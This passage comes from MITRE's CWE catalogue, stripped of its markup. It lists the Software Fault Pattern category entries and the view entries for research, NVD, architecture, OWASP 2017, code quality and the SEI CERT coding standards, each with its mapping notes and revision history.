Software Fault Patterns (SFPs) within the Faulty Memory Release cluster (SFP12). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Buffer Access cluster (SFP8). + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Pointer Use cluster (SFP7). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty String Expansion cluster (SFP9). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Improper NULL Termination cluster (SFP11). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Incorrect Buffer Length Computation cluster (SFP10). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Architecture cluster. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Compiler cluster. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Design cluster. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Implementation cluster. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Failed Chroot Jail cluster (SFP17). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Link in Resource Name Resolution cluster (SFP18). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Path Traversal cluster (SFP16). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Failure to Release Resource cluster (SFP14). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Resource Use cluster (SFP15). + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Life Cycle cluster. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Unrestricted Consumption cluster (SFP13). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Missing Lock cluster (SFP19). + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Multiple Locks/Unlocks cluster (SFP21). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Race Condition Window cluster (SFP20). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Unrestricted Lock cluster (SFP22). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Command cluster (SFP24). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Environment cluster (SFP27). + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Input Transformation cluster. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Incorrect Input Handling cluster. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Variable cluster (SFP25). + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Feature cluster. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Security cluster. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Information Loss cluster. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Glitch in Computation cluster (SFP1). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + + + This view is intended to facilitate research into weaknesses, including their inter-dependencies, and can be leveraged to systematically identify theoretical gaps within CWE. It is mainly organized according to abstractions of behaviors instead of how they can be detected, where they appear in code, or when they are introduced in the development life cycle. By design, this view is expected to include every weakness within CWE. + + + Academic Researchers + Academic researchers can use the high-level classes that lack a significant number of children to identify potential areas for future research. + + + Vulnerability Analysts + Those who perform vulnerability discovery/analysis use this view to identify related weaknesses that might be leveraged by following relationships between higher-level classes and bases. + + + Assessment Tool Vendors + Assessment vendors often use this view to help identify additional weaknesses that a tool may be able to detect as the relationships are more aligned with a tool's technical capabilities. + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + This view uses a deep hierarchical organization, with more levels of abstraction than other classification schemes. The top-level entries are called Pillars. Where possible, this view uses abstractions that do not consider particular languages, frameworks, technologies, life cycle development phases, frequency of occurrence, or types of resources. It explicitly identifies relationships that form chains and composites, which have not been a formal part of past classification efforts. Chains and composites might help explain why mutual exclusivity is difficult to achieve within security error taxonomies. This view is roughly aligned with MITRE's research into vulnerability theory, especially with respect to behaviors and resources. Ideally, this view will only cover weakness-to-weakness relationships, with minimal overlap and zero categories. It is expected to include at least one parent/child relationship for every weakness within CWE. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, Relationships, View_Audience, View_Structure + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Description, Other_Notes, View_Audience + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, View_Audience + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Natural Hierarchy + + + + CWE entries in this view (graph) may be used to categorize potential weaknesses within sources that handle public, third-party vulnerability information, such as the National Vulnerability Database (NVD). By design, this view is incomplete; it is limited to a small number of the most commonly-seen weaknesses, so that it is easier for humans to use. This view uses a shallow hierarchy of two levels in order to simplify the complex, category-oriented navigation of the entire CWE corpus. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + This view may change in any upcoming CWE version based on the experience of NVD analysts, public feedback, and the CWE Team - especially with respect to the CWE Top 25 analysis. + This view has been modified significantly since its last major revision in 2016 (CWE-635 was used before 2016). + + + + CWE Content Team + MITRE + 2015-12-07 + 2.9 + 2015-12-07 + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Description, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2019-09-23 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + NIST + 2015-12-07 + Provided many relationships. + + + + + This view organizes weaknesses according to common architectural security tactics. It is intended to assist architects in identifying potential mistakes that can be made when designing software. + + + Software Developers + Architects that are part of a software development team may find this view useful as the weaknesses are organized by known security tactics, aiding the arcitect in embedding security throughout the design process instead of discovering weaknesses after the software has been built. + + + Educators + Educators may use this view as reference material when discussing security by design or architectural weaknesses, and the types of mistakes that can be made. + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The top level categories in this view represent the individual tactics that are part of a secure-by-design approach to software development. The weaknesses that are members of each category contain information about how each is introduced relative to the software's architecture. Three different modes of introduction are used: Omission - caused by missing a security tactic when it is necessary. Commission - refers to incorrect choice of tactics which could result in undesirable consequences. Realization - appropriate security tactics are adopted but are incorrectly implemented. + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2018-03-27 + updated Description, Other_Notes, View_Audience + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2017. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2017 version), providing a good starting point for web application developers who want to code more securely. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten (2017 version), providing product customers with a way of asking their software development teams to follow minimum expectations for secure code. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view have been pulled directly from the 2017 OWASP Top 10 document, either from the explicit mapping section, or from weakness types alluded to in the written sections. + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated References, View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE identifiers in this view (slice) are quality issues that only indirectly make it easier to introduce a vulnerability and/or make the vulnerability more difficult to detect or mitigate. + + + Assessment Tool Vendors + This view makes it easier for assessment vendors to identify and improve coverage for quality-related weaknesses. + + + Software Developers + This view makes it easier for developers to identify and learn about issues that might make their code more difficult to maintain, perform efficiently or reliably, or secure. + + + Product Vendors + This view makes it easier for software vendors to identify important issues that may make their software more difficult to maintain, perform efficiently or reliably, or secure. + + + /Weakness_Catalog/Weaknesses/Weakness[Weakness_Ordinalities/Weakness_Ordinality/Ordinality='Indirect'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2018-07-12 + 3.2 + 2019-01-03 + View originally constructed using entries from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view have maintenance notes. Maintenance notes are an indicator that an entry might change significantly in future versions. This view was created due to feedback from the CWE Board and participants in the CWE Compatibility Summit in March 2021. + + + Assessment Tool Vendors + Assessment vendors may use this view to anticipate future changes to CWE that will help them to better prepare customers for important changes in CWE. + + + /Weakness_Catalog/*/*[Notes/Note[@Type='Maintenance']] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2021-03-14 + 4.4 + 2021-03-15 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view outlines the most important software quality issues as identified by the Consortium for Information & Software Quality (CISQ) Automated Quality Characteristic Measures, released in 2016. These measures are derived from Object Management Group (OMG) standards. + + + Software Developers + This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. + + + Product Vendors + This view can help product vendors understand code quality issues and convey an overall status of their software. + + + Assessment Tool Vendors + This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2018-07-23 + 3.2 + 2019-01-03 + View constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, View_Audience + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT Oracle Coding Standard for Java. + + + Software Developers + By following the SEI CERT Oracle Coding Standard for Java, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following the SEI CERT Oracle Secure Coding Standard for Java, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2018-12-11 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT C Coding Standard. + + + Software Developers + By following the SEI CERT C Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following the SEI CERT C Coding standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2018-12-18 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT Perl Coding Standard. + + + Software Developers + By following the SEI CERT Perl Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following the SEI CERT Perl Coding Standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to 